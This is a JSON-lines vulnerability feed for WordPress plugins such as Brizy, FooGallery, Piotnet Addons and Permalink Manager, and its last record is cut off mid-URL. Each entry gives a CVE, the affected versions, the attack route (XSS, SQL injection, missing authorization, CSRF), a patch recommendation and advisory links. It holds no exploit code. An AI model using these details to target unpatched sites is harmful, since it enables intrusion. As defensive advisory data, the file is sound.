{"CVE_ID":"CVE-2024-1940","slug":"brizy","versionImpact":"2.4.41","versionEndExcluding":"2.4.42","description":"The Brizy \u2013 Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via post content in all versions up to, and including, 2.4.41 due to insufficient input sanitization performed only on the client side and insufficient output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.42, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e056dcb5-a66b-4cd3-9a73-37f226015e09?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e056dcb5-a66b-4cd3-9a73-37f226015e09?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3055256%40brizy&new=3055256%40brizy&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3055256%40brizy&new=3055256%40brizy&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8195","slug":"permalink-manager","versionImpact":"2.4.4","versionEndExcluding":"2.4.4.1","description":"The Permalink Manager Lite plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'debug_data', 'debug_query', and 'debug_redirect' functions in all versions up to, and including, 2.4.4. This makes it possible for unauthenticated attackers to extract sensitive data including password, title, and content of password-protected posts.","recommendation":"Update to version 2.4.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aadf1d59-60ba-4da2-adbb-4e84d587a34d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aadf1d59-60ba-4da2-adbb-4e84d587a34d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/permalink-manager\\\/tags\\\/2.4.4\\\/includes\\\/core\\\/permalink-manager-debug.php#L70\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/permalink-manager\\\/tags\\\/2.4.4\\\/includes\\\/core\\\/permalink-manager-debug.php#L70\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3142479\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3142479\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6498","slug":"collectchat","versionImpact":"2.4.3","versionEndExcluding":"2.4.4","description":"The Chatbot for WordPress by Collect.chat ?? WordPress plugin before 2.4.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"Update to version 2.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eed58889-4be8-48df-9ef6-269df451e79e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eed58889-4be8-48df-9ef6-269df451e79e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3919","slug":"comments-import-export-woocommerce","versionImpact":"2.4.3","versionEndExcluding":"2.4.4","description":"The WordPress Comments Import & Export plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_settings function in all versions up to, and including, 2.4.3. Additionally, the plugin fails to properly sanitize and escape FTP settings parameters. \r\nThis makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts on the plugin settings page that will execute whenever an administrative user accesses an injected page.\r\nThe vulnerability was partially fixed in version 2.4.3 and fully fixed in version 2.4.4","recommendation":"Update to version 2.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/comments-import-export-woocommerce\\\/trunk\\\/includes\\\/settings\\\/class-hf_cmt_impexpcsv-settings.php?rev=3278076\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/comments-import-export-woocommerce\\\/trunk\\\/includes\\\/settings\\\/class-hf_cmt_impexpcsv-settings.php?rev=3278076\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3288894\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3288894\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3301183\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3301183\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8bc8863-04a9-4631-9510-624f98ea1e75?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8bc8863-04a9-4631-9510-624f98ea1e75?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9866","slug":"event-tickets-with-ticket-scanner","versionImpact":"2.4.3","versionEndExcluding":"2.4.4","description":"The Event Tickets with Ticket Scanner plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'data' parameters in all versions up to, and including, 2.4.4 due to insufficient input sanitization and output escaping and missing authorization on the functionality to manage tickets. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This missing authorization aspect of this was patched in 2.4.1, while the Cross-Site Scripting was fully patched in 2.4.4.","recommendation":"Update to version 2.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3172740%40event-tickets-with-ticket-scanner&new=3172740%40event-tickets-with-ticket-scanner&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3172740%40event-tickets-with-ticket-scanner&new=3172740%40event-tickets-with-ticket-scanner&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3201198%40event-tickets-with-ticket-scanner&new=3201198%40event-tickets-with-ticket-scanner&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3201198%40event-tickets-with-ticket-scanner&new=3201198%40event-tickets-with-ticket-scanner&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4dcf1133-d437-4f0a-b2cf-c91e0f6b6ca9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4dcf1133-d437-4f0a-b2cf-c91e0f6b6ca9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10775","slug":"piotnet-addons-for-elementor","versionImpact":"2.4.32","versionEndExcluding":"2.4.33","description":"The Piotnet Addons For Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.4.32 via the 'pafe-template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.","recommendation":"Update to version 2.4.33, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3221445%40piotnet-addons-for-elementor&new=3221445%40piotnet-addons-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3221445%40piotnet-addons-for-elementor&new=3221445%40piotnet-addons-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5fdbc9bc-70cf-4440-b12d-dd98844d33bc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5fdbc9bc-70cf-4440-b12d-dd98844d33bc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6068","slug":"foogallery","versionImpact":"2.4.31","versionEndExcluding":"2.4.32","description":"The FooGallery \u2013 Responsive Photo Gallery, Image Viewer, Justified, Masonry & Carousel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `data-caption-title` & `data-caption-description` HTML attributes in all versions up to, and including, 2.4.31 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.32, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/foogallery\\\/trunk\\\/extensions\\\/default-templates\\\/shared\\\/js\\\/foogallery.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/foogallery\\\/trunk\\\/extensions\\\/default-templates\\\/shared\\\/js\\\/foogallery.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3322251%40foogallery&new=3322251%40foogallery&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3322251%40foogallery&new=3322251%40foogallery&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a6be4aaa-f8a1-42d6-95c1-062c5ca51004?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a6be4aaa-f8a1-42d6-95c1-062c5ca51004?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5502","slug":"piotnet-addons-for-elementor","versionImpact":"2.4.30","versionEndExcluding":"2.4.31","description":"The Piotnet Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Image Accordion, Dual Heading, and Vertical Timeline widgets in all versions up to, and including, 2.4.30 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.31, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/921616e4-2b66-4847-869a-90c1c459685f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/921616e4-2b66-4847-869a-90c1c459685f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/piotnet-addons-for-elementor\\\/trunk\\\/widgets\\\/pafe-image-accordion.php#L627\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/piotnet-addons-for-elementor\\\/trunk\\\/widgets\\\/pafe-image-accordion.php#L627\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/piotnet-addons-for-elementor\\\/trunk\\\/widgets\\\/pafe-dual-color-headline.php#L392\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/piotnet-addons-for-elementor\\\/trunk\\\/widgets\\\/pafe-dual-color-headline.php#L392\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/piotnet-addons-for-elementor\\\/trunk\\\/widgets\\\/pafe-vertical-timeline.php#L622\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/piotnet-addons-for-elementor\\\/trunk\\\/widgets\\\/pafe-vertical-timeline.php#L622\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3138599\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3138599\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5614","slug":"piotnet-addons-for-elementor","versionImpact":"2.4.29","versionEndExcluding":"2.4.30","description":"The Piotnet Addons For Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.4.29 via the 'pafe_posts_list' function. This makes it possible for unauthenticated attackers to extract sensitive data including titles and excerpts of future, draft, and pending blog posts.","recommendation":"Update to version 2.4.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2880cde0-a278-4a41-97f7-c54c2b3aceb2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2880cde0-a278-4a41-97f7-c54c2b3aceb2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/piotnet-addons-for-elementor\\\/trunk\\\/inc\\\/ajax-posts-list.php#L4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/piotnet-addons-for-elementor\\\/trunk\\\/inc\\\/ajax-posts-list.php#L4\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3125094\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3125094\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12119","slug":"foogallery","versionImpact":"2.4.29","versionEndExcluding":"2.4.30","description":"The FooGallery \u2013 Responsive Photo Gallery, Image Viewer, Justified, Masonry & Carousel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the default_gallery_title_size parameter in all versions up to, and including, 2.4.29 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with granted gallery and album creator roles, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.4.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/fooplugins\\\/foogallery\\\/blob\\\/master\\\/extensions\\\/albums\\\/album-default.php#L26\",\"name\":\"https:\\\/\\\/github.com\\\/fooplugins\\\/foogallery\\\/blob\\\/master\\\/extensions\\\/albums\\\/album-default.php#L26\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/foogallery\\\/tags\\\/2.4.27\\\/extensions\\\/albums\\\/album-default.php#L26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/foogallery\\\/tags\\\/2.4.27\\\/extensions\\\/albums\\\/album-default.php#L26\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2070c6e6-d830-4d1c-9408-5cb2254a00e5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2070c6e6-d830-4d1c-9408-5cb2254a00e5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12114","slug":"foogallery","versionImpact":"2.4.29","versionEndExcluding":"2.4.30","description":"The FooGallery \u2013 Responsive Photo Gallery, Image Viewer, Justified, Masonry & Carousel plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.4.29 via the foogallery_attachment_modal_save AJAX action due to missing validation on a user controlled key (img_id). This makes it possible for authenticated attackers, with granted access and above, to update arbitrary post and page content. This requires the Gallery Creator Role setting to be a value lower than 'Editor' for there to be any real impact.","recommendation":"Update to version 2.4.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/fooplugins\\\/foogallery\\\/blob\\\/master\\\/includes\\\/admin\\\/class-gallery-attachment-modal.php#L242\",\"name\":\"https:\\\/\\\/github.com\\\/fooplugins\\\/foogallery\\\/blob\\\/master\\\/includes\\\/admin\\\/class-gallery-attachment-modal.php#L242\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250684\\\/foogallery\\\/tags\\\/2.4.30\\\/includes\\\/admin\\\/class-gallery-attachment-modal.php?old=3229839&old_path=foogallery%2Ftags%2F2.4.29%2Fincludes%2Fadmin%2Fclass-gallery-attachment-modal.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250684\\\/foogallery\\\/tags\\\/2.4.30\\\/includes\\\/admin\\\/class-gallery-attachment-modal.php?old=3229839&old_path=foogallery%2Ftags%2F2.4.29%2Fincludes%2Fadmin%2Fclass-gallery-attachment-modal.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4fe3ad9-247f-4e5d-8c79-0970afaa7729?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4fe3ad9-247f-4e5d-8c79-0970afaa7729?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2538","slug":"permalink-manager","versionImpact":"2.4.3.1","versionEndExcluding":"2.4.3.2","description":"The Permalink Manager Lite plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ajax_save_permalink' function in all versions up to, and including, 2.4.3.1. This makes it possible for authenticated attackers, with author access and above, to modify the permalinks of arbitrary posts.","recommendation":"Update to version 2.4.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70cd028d-122d-4e3c-ac09-150dec07a2cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70cd028d-122d-4e3c-ac09-150dec07a2cd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/gist.github.com\\\/Xib3rR4dAr\\\/b1eec00e844932c6f2f30a63024b404e\",\"name\":\"https:\\\/\\\/gist.github.com\\\/Xib3rR4dAr\\\/b1eec00e844932c6f2f30a63024b404e\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3052848#file35\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3052848#file35\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11811","slug":"push-notification-by-feedify","versionImpact":"2.4.2","versionEndExcluding":"2.4.3","description":"The Feedify \u2013 Web Push Notifications plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'platform', 'phone', 'email', and 'store_url' parameters. in all versions up to, and including, 2.4.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3209183%40push-notification-by-feedify%2Ftrunk&old=3177773%40push-notification-by-feedify%2Ftrunk&sfp_email=&sfph_mail=#file15\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3209183%40push-notification-by-feedify%2Ftrunk&old=3177773%40push-notification-by-feedify%2Ftrunk&sfp_email=&sfph_mail=#file15\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a5a33fd-ecc6-40bf-93a5-10ead1c4c1f5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a5a33fd-ecc6-40bf-93a5-10ead1c4c1f5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6872","slug":"templatespare","versionImpact":"2.4.2","versionEndExcluding":"2.4.3","description":"The Build Your Dream Website Fast with 400+ Starter Templates and Landing Pages, No Coding Needed, One-Click Import for Elementor & Gutenberg Blocks! \u2013 TemplateSpare plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'templatespare_activate_required_theme' and 'templatespare_get_theme_status' functions in all versions up to, and including, 2.4.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to activate any installed theme and read any theme status. If the attacker attempts to activate a theme that is not installed, a non-existent theme with the slug chosen by the attacker will be considered the active theme, leaving the site with no theme functionality.","recommendation":"Update to version 2.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0c74807-b85c-478e-bebf-1f0b46a21c11?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a0c74807-b85c-478e-bebf-1f0b46a21c11?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/templatespare\\\/trunk\\\/includes\\\/templatespare-kit.php#L13\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/templatespare\\\/trunk\\\/includes\\\/templatespare-kit.php#L13\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/templatespare\\\/trunk\\\/includes\\\/templatespare-kit.php#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/templatespare\\\/trunk\\\/includes\\\/templatespare-kit.php#L34\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3129809\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3129809\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3201","slug":"kali-forms","versionImpact":"2.4.2","versionEndExcluding":"2.4.3","description":"The Contact Form builder with drag & drop for WordPress  WordPress plugin before 2.4.3 does not sanitise and escape some of its settings, which could allow high privilege users such as contributors to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 2.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4248289f-36d2-41c5-baf6-bb2c630482ef\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4248289f-36d2-41c5-baf6-bb2c630482ef\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11840","slug":"unusedcss","versionImpact":"2.4.2","versionEndExcluding":"2.4.3","description":"The RapidLoad \u2013 Optimize Web Vitals Automatically plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a missing capability check on the uucss_data, update_rapidload_settings, wp_ajax_update_htaccess_file, uucss_update_rule, upload_rules, get_all_rules, update_titan_settings, preload_page, and activate_module functions in all versions up to, and including, 2.4.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify plugin settings or conduct SQL injection attacks.","recommendation":"Update to version 2.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202982\\\/unusedcss\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202982\\\/unusedcss\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c8ff4ec-9b40-4d59-b3b0-382f91042a4a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c8ff4ec-9b40-4d59-b3b0-382f91042a4a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6750","slug":"wp-clone-by-wp-academy","versionImpact":"2.4.2","versionEndExcluding":"2.4.3","description":"The Clone WordPress plugin before 2.4.3 uses buffer files to store in-progress backup informations, which is stored at a publicly accessible, statically defined file path.","recommendation":"Update to version 2.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fad9eefe-4552-4d20-a1fd-bb2e172ec8d7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fad9eefe-4552-4d20-a1fd-bb2e172ec8d7\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10247","slug":"gallery-videos","versionImpact":"2.4.2","versionEndExcluding":"2.4.3","description":"The Video Gallery \u2013 Best WordPress YouTube Gallery Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the orderby parameter in all versions up to, and including, 2.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/179387\\\/WordPress-Video-Gallery-YouTube-Gallery-And-Vimeo-Gallery-2.3.6-SQL-Injection.html\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/179387\\\/WordPress-Video-Gallery-YouTube-Gallery-And-Vimeo-Gallery-2.3.6-SQL-Injection.html\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gallery-videos\\\/trunk\\\/admin\\\/class-tsvg-list.php#L15\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gallery-videos\\\/trunk\\\/admin\\\/class-tsvg-list.php#L15\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3200979\\\/gallery-videos\\\/trunk\\\/admin\\\/class-tsvg-list.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3200979\\\/gallery-videos\\\/trunk\\\/admin\\\/class-tsvg-list.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5524582-5aac-48b4-ad67-7c4829d63ed0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5524582-5aac-48b4-ad67-7c4829d63ed0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36754","slug":"paid-memberships-pro","versionEndExcluding":"2.4.3","description":"The Paid Memberships Pro  plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.4.2. This is due to missing or incorrect nonce validation on the pmpro_page_save() function. This makes it possible for unauthenticated attackers to save pages via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368689%40paid-memberships-pro&new=2368689%40paid-memberships-pro&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368689%40paid-memberships-pro&new=2368689%40paid-memberships-pro&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d74553a4-0ef7-4908-a2e8-5e0216f7b256?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d74553a4-0ef7-4908-a2e8-5e0216f7b256?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-